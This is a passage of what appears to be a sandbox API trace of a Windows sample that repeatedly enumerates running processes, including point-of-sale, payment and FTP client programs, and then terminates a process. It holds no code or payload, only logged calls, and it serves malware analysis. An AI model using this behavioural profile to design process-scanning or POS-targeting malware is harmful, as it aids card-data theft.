cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0060.821] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0060.822] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0060.823] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0060.824] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0060.825] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0060.825] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0060.826] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0060.827] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0060.828] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0060.829] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="kay.exe")) returned 1 [0060.829] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos_pulse_angry.exe")) returned 1 [0060.830] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="surelycakemechanisms.exe")) returned 1 [0060.831] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="renometric.exe")) returned 1 [0060.831] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0060.832] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0060.833] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0060.834] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0060.835] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0060.835] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x7c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="osk.exe")) returned 1 [0060.836] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0060.837] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0060.837] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0060.838] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 0 [0060.838] CloseHandle (hObject=0x17c) returned 1 [0060.839] Sleep (dwMilliseconds=0x1) [0060.893] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0060.897] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0060.897] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0060.898] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0060.899] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.899] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0060.900] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.900] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0060.901] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0060.902] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0060.902] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0060.903] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.903] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.904] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.904] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.905] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.906] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0060.906] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.907] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.907] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0060.909] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0060.909] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0060.910] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.910] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0060.911] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0060.912] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="avi_attach_midnight.exe")) returned 1 [0060.912] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="packs_foundation_penn.exe")) returned 1 [0060.913] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="similar-kenya-hurt.exe")) returned 1 [0060.913] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="running.exe")) returned 1 [0060.914] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ordinance jelsoft dies.exe")) returned 1 [0060.915] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="introducing_attraction_ranks.exe")) returned 1 [0060.915] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="include-assuming-employers.exe")) returned 1 [0060.916] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operateleetechnologies.exe")) returned 1 [0060.916] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mongolia.exe")) returned 1 [0060.917] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="futurevalleyturned.exe")) returned 1 [0060.917] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="besides-tba-comfortable.exe")) returned 1 [0060.918] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extreme-quiz-standard.exe")) returned 1 [0060.919] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sat_ipod.exe")) returned 1 [0060.919] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="well-buttons.exe")) returned 1 [0060.920] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="qty.exe")) returned 1 [0060.920] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="interesting-extends.exe")) returned 1 [0060.921] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fence.exe")) returned 1 [0060.921] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="descending.exe")) returned 1 [0060.922] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="blank.exe")) returned 1 [0060.923] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="algorithms-jefferson.exe")) returned 1 [0060.923] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0060.924] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0060.925] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0060.925] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0063.786] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0063.794] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.423] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0064.427] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.510] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0064.513] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.673] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0064.677] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0064.951] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0065.119] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0065.124] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0065.304] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0065.308] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0065.800] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0065.804] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0065.901] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0065.906] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf0 | out: lppe=0x292fdf0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.004] TerminateProcess (hProcess=0x178, uExitCode=0x0) returned 1 [0066.131] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0066.135] Process32First (in: 